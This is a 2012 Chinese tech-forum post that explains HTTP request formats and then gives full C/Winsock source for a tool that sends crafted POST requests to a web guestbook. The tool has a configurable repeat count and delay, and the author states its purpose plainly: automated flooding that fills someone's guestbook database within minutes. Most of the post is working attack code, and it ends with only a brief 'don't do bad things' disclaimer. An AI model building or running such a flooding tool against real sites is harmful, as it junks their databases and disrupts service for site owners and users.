设为首页收藏本站
切换到宽版

电脑疯子技术论坛|电脑极客社区

 找回密码
 注册

QQ登录

只需一步,快速开始

电脑疯子技术论坛|电脑极客社区»技术论坛 电脑疯子|资源分享 实用软件下载 用Winsock实现对网站数据库的数据注入
返回列表 发新帖

用Winsock实现对网站数据库的数据注入

[复制链接]
bek 发表于 2012-4-9 01:16:01 | 显示全部楼层 |阅读模式
  1. 在看这篇文章之前,有必要对"注入"一词阐述一下。区别于通常的SQL注入,这里的注入实际上只是构造HTTP请求报文,以程序的方式代替WEB提交页面,实现数据的自动提交。嘿嘿,我们只要写个循环,用什么语言你说了算,向特定的WEB页面发送HTTP报文,只要几分钟,他的本本就爆了,如下文:
  2. 首先,还是温习一下HTTP协议吧。我们在打开一个网站时,比如说http://www.163.com,实际上IE作为一个客户端,它将向服务器发送如下的请求报文(用sniffer截得的):
  3. GET / HTTP/1.1
  4. Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-
  5. powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
  6. Accept-Language: zh-cn
  7. Accept-Encoding: gzip, deflate
  8. User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
  9. Host: www.163.com
  10. Connection: Keep-Alive
  11. Cookie: NETEASE_SSN=jsufcz; NETEASE_ADV=11&22; Province=0; City=0; NTES_UV_COOKIE=YES
  12. 我们看到在以上的报文中,有很多字段,当然其中有很多并不是必须的,如果我们自己编程,只关心必要的就行了。在HTTP/1.1协议中规定了最小请求消息由方法字段(GET/POST/HEAD)和主机字段(HOST)构成。如上面的
  13. GET / HTTP/1.1
  14. HOST:www.163.com
  15. 但在HTTP/1.0中,HOST字段并不是必须的,这里为什么不能省,相信你也知道,不晓得的话也不打紧,接下来看。
  16. 为了向服务器发送数据,浏览器通常采用GET或POST方法向服务器提交报文。服务器在收到报文之后,解码分析出所需的数据并进行处理,最后返回结果。通常我们可以见到诸如http://xxx.xxx.xxx.xxx/show.asp?id=xxx的URL请求,我们可以自己构造如下的报文来完成
  17. GET /show.asp?id=xxx HTTP/1.1
  18. HOST:xxx.xxx.xxx.xxx
  19. 受URL长度1024的限制,采用GET方法只能提交少量的数据,假如我们在录入一篇文章时,这时就只能用到POST方法了。在讲解POST方法的一些要点之前,还是让大家来看一段POST请求报文,以致对POST报文有个大致的了解。(下面是我向某本本的留言,偶照样用sniffer截下来了)
  20. POST /gbook/add.php HTTP/1.1
  21. Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-
  22. powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwav
  23. e-flash, */*
  24. Referer: http://218.76.65.47/gbook/add.php
  25. Accept-Language: zh-cn
  26. Content-Type: application/x-www-form-urlencoded
  27. Accept-Encoding: gzip, deflate
  28. User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
  29. Host: 218.76.65.47
  30. Content-Length: 115
  31. Connection: Keep-Alive
  32. name=test&email=&comefrom=&homepage=&icq=&oicq=&image=say.gif&comment=test&passw
  33. ord=&doadd=%B7%A2%CB%CD%C1%F4%D1%D4
  34. 与GET方法相比,在字段下面多了一段内容,这就是我们向留言本提交的数据,如果有中文须经过urlencode编码。同样让我们省去不必要的字段,构造一个最小的POST请求
  35. POST /gbook/add.php HTTP/1.1
  36. Host: 218.76.65.47
  37. Content-Type: application/x-www-form-urlencoded
  38. Content-Length: 115
  39. name=test&email=&comefrom=&homepage=&icq=&oicq=&image=say.gif&comment=test&passw
  40. ord=&doadd=%B7%A2%CB%CD%C1%F4%D1%D4
  41. 上面的Content-Type字段表示为POST表单型的,Content-Length当然就是表示实体数据的长度了,这里都不能少,不然就无法正确接收了。这样,服务器端处理页面就会收到你提交的数据,并接收处理,如果是留言本的话就写入数据库了。若以很快的速度向某个本本发送这样的报文,实际上那个本本己经被你狂灌水了。
  42. 讲了客户端的发送,接下来就该讲服务器的接收问题了。
  43. 当报文数据到达服务器后,服务器底层进程进行接收并放入特定的缓冲区,同时置一些环境变量,如"CONTENT_LENGTH"、"QUERY_STRING"等,当然这其间还是屏蔽了一些底层细节的,如客户端提交的数据是怎么被重置到被请求页的标准输入的,之后高层应用程序如CGI、ASP、PHP等对其进行数据提取,其中CGI还须自己进行Unencode解码和字符串提取。假如向一ASP本本写留言,我提交了姓名(name)和内容(body)字段,且采用POST表单方式提交,在ASP程序中应如下进行接收:
  44. name=request.form("name")
  45. body=request.form("body")
  46. 并添加到数据库中
  47. rs.addnew
  48. rs("name")=name
  49. rs("body")=body
  50. rs.update
  51. 到此,该讲的也基本上讲完了,但有一点还要注意下,在发送报文时,在实体内容中还须加入提交按钮的"name=value"URLEncode编码,否则有可能不会写入数据库,Why ?I am finding the reason!
  52.  
  53.  
  54. 以下是相关的源代码:
  55. /*    encode.h    */
  56. /* Unencode URL编码函数 */
  57. /*
  58. 在这里要注意,编译器在处理中文字符时,会自动根据字符的位7来读入一个
  59. 或两个字符,这时可以强制采用unsigned char *来读入一个字符。
  60. */
  61. int isT(char ch)
  62. {
  63. if(ch==' '||ch=='%'||ch=='/'||ch&0x80) return 1;
  64. else return 0;
  65. }
  66. int encode(char *s,char *d)
  67. {
  68. if(!s||!d) return 0;
  69. for(;*s!=0;s++)
  70. {
  71. unsigned char *p=(unsigned char*)s;
  72. if(*p==' ')
  73. {
  74. *d='%';
  75. *(d+1)='2';
  76. *(d+2)='0';
  77. d+=3;
  78. }
  79. else if(isT(*p))
  80. {
  81. char a[3];
  82. *d='%';
  83. sprintf(a,"%02x",*p);
  84. *(d+1)=a[0];
  85. *(d+2)=a[1];
  86. d+=3;
  87. }
  88. else
  89. {
  90. *d=*p;
  91. d++;
  92. }
  93. }
  94. *d=0;
  95. return 1;
  96. }
  97. /* Unencode URL解码函数 */
  98. int unencode(char *s,char *d)
  99. {
  100. if(!s||!d) return 0;
  101. for(;*s!=0;s++)
  102. {
  103. if(*s=='+')
  104. {
  105. *d=' ';
  106. d++;
  107. }
  108. else if(*s=='%')
  109. {
  110. int code;
  111. if(sscanf(s+1,"%02x",&code)!=1) code='?';
  112. *d=code;
  113. s+=2;
  114. d++;
  115. }
  116. else
  117. {
  118. *d=*s;
  119. d++;
  120. }
  121. }
  122. *d=0;
  123. return 1;
  124. }
  125. /*  booksend.cpp  */
  126. /*    报文发送程序    */
  127. #include
  128. #include
  129. #include "encode.h"
  130. #include
  131. #pragma comment(lib,"ws2_32.lib")
  132. int checkpra(int argc,char *argv[]);
  133. void usage();
  134. DWORD WINAPI senddata(LPVOID lp);
  135. char ip[20]={0};
  136. USHORT port=0;
  137. char page[128]={0};
  138. char value[1024]={0};
  139. int ttime=1;
  140. int delaytime=2000;
  141. SOCKET sock;
  142. struct sockaddr_in sin;
  143. char sendbuf[1024*4]={0};
  144. void main(int argc,char *argv[])
  145. {
  146. if(checkpra(argc,argv)==-1) return;
  147. WSADATA wsa;
  148. if(WSAStartup(0x0202,&wsa)!=0)
  149. {
  150. printf("WSAStartup failed with error:%d\n",GetLastError());
  151. return;
  152. }
  153. sin.sin_family=AF_INET;
  154. if(inet_addr(ip)!=INADDR_NONE)
  155. sin.sin_addr.s_addr=inet_addr(ip);
  156. else
  157. {
  158. struct hostent *phost=gethostbyname(ip);
  159. if(phost==NULL)
  160. {
  161. printf("Resolve %s error!\n",ip);
  162. return;
  163. }
  164. memcpy(&sin.sin_addr,phost->h_addr_list[0],phost->h_length);
  165. }
  166. sin.sin_port=htons(port);
  167. char tempbuf[1024]={0};
  168. sprintf(tempbuf,"POST %s HTTP/1.1\n",page);
  169. strcpy(sendbuf,tempbuf);
  170. memset(tempbuf,0,sizeof(tempbuf));
  171. sprintf(tempbuf,"HOST: %s\n",ip);
  172. strcat(sendbuf,tempbuf);
  173. strcat(sendbuf,"Accept: image/gif, */*\n");
  174. strcat(sendbuf,"Content-Type: application/x-www-form-urlencoded\n");
  175. memset(tempbuf,0,sizeof(tempbuf));
  176. sprintf(tempbuf,"Content-Length: %d\n",strlen(value));
  177. strcat(sendbuf,tempbuf);
  178. strcat(sendbuf,"Connection: Keep-Alive\n\n");
  179. strcat(sendbuf,value);
  180. for(int i=0;i    {
  181. CreateThread(NULL,0,senddata,&i,0,NULL);
  182. Sleep(delaytime);
  183. }
  184. WSACleanup();
  185. }
  186. DWORD WINAPI senddata(LPVOID lp)
  187. {
  188. SOCKET sock=socket(AF_INET,SOCK_STREAM,0);
  189. if(sock==INVALID_SOCKET)
  190. {
  191. printf("Socket() failed with error:%d\n",GetLastError());
  192. return -1;
  193. }
  194. int ret;
  195. printf("State:Connecting...\n");
  196. ret=connect(sock,(struct sockaddr*)&sin,sizeof(sin));
  197. if(ret==SOCKET_ERROR)
  198. {
  199. printf("Connect() failed with error:%d\n",GetLastError());
  200. return -1;
  201. }
  202. printf("State:Connected!\n");
  203. printf("State:Sending...time %d ",*(int*)lp+1);
  204. ret=send(sock,sendbuf,strlen(sendbuf)+1,0);
  205. if(ret>0)
  206. printf("Send success!\n");
  207. else
  208. printf("Send error!\n");
  209. char recvbuf[1024*10]={0};
  210. ret=recv(sock,recvbuf,sizeof(recvbuf),0);
  211. if(strstr(recvbuf,"100")||strstr(recvbuf,"200")||strstr(recvbuf,"302"))
  212. printf("呵呵,注入成功啦!\n\n");
  213. else
  214. printf("注入有点问题哦,请查实一下!\n\n");
  215. closesocket(sock);
  216. return 1;
  217. }
  218. void usage()
  219. {
  220. char pathname[128]={0};
  221. GetModuleFileName(NULL,pathname,sizeof(pathname));
  222. char *p=pathname+strlen(pathname)-1;
  223. for(;*p!='\\';p--);
  224. printf("-------------------------------------------------------------------------------\n");
  225. printf("Usage:%s ip port page value [times] [delay]\n",p+1);
  226. printf("Code by JsuFcz--http://jsufcz.21xcn.net\n");
  227. printf("Ex:%s 10.0.0.169 80 /guestbk/add.php name=abc-body=hehe-doadd=发送留言",p+1);
  228. printf("-------------------------------------------------------------------------------\n");
  229. }
  230. int checkpra(int argc,char *argv[])
  231. {
  232. if(argc<5)
  233. {
  234. printf("错误的用法:至少应使用4个参数\n\n");
  235. usage();
  236. return -1;
  237. }
  238. else if(argc>6)
  239. {
  240. printf("错误的用法:最多只有6个参数\n\n");
  241. usage();
  242. return -1;
  243. }
  244. if(argc==6)
  245. {
  246. ttime=atoi(argv[5]);
  247. }
  248. if(argc==7)
  249. {
  250. ttime=atoi(argv[5]);
  251. delaytime=atoi(argv[6]);
  252. }
  253. strcpy(ip,argv[1]);
  254. port=atoi(argv[2]);
  255. strcpy(page,argv[3]);
  256. for(int i=0;argv[4][i]!=0;i++)
  257. {
  258. if(argv[4][i]=='-') argv[4][i]='&';
  259. if(argv[4][i]=='\'') argv[4][i]=' ';
  260. }
  261. encode(argv[4],value);
  262. return 0;
  263. }
  264. 以上代码已在VC6上编译通过
  265. 至此我们已经完成了。我们可以分享下技术,但是不要去干坏事哦。
复制代码
程序, 数据, 网站, 文章

相关帖子
回复

举报

黑夜的星空 发表于 2012-4-9 12:19:56 | 显示全部楼层
看看,学习学习{:3_231:}
回复 支持 反对

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

手机版|小黑屋|VIP|电脑疯子技术论坛 ( Computer madman team )

GMT+8, 2025-1-23 09:20

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表